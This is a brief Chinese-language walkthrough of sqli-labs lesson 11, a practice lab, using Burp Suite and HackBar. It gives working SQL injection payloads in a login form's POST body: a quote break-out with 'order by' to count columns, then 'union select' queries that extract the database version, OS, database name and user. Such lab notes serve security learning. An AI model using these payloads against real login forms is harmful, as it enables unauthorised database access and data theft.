sqli-labs/11
sqli-labs/lesson-11
第11关
打开第11关,index.php,添加echo $sql.
利用burp抓包,并且此代码复制过来.
注意此处有单引号,所以注入时,也要有单引号.
uname=admi' order by 2 #&passwd=admin&submit=Submit
利用order by n,猜解有几个id
利用hackbar查询,order by 2,判断有几个id. 后面记得加#或者--+,这是注释符.
接下来进行联合查询.在字段1,2,处进行查询,
信息收集关键词有:
- user() root@localhost
- version() 5.5.53
- @@version_compile_os Win32
- database() security
uname=admi' union select version(),@@version_compile_os #&passwd=admin&submit=Submit
uname=admi' union select database(),user() #&passwd=admin&submit=Submit
利用burp的repeater模块也可以进行sql注入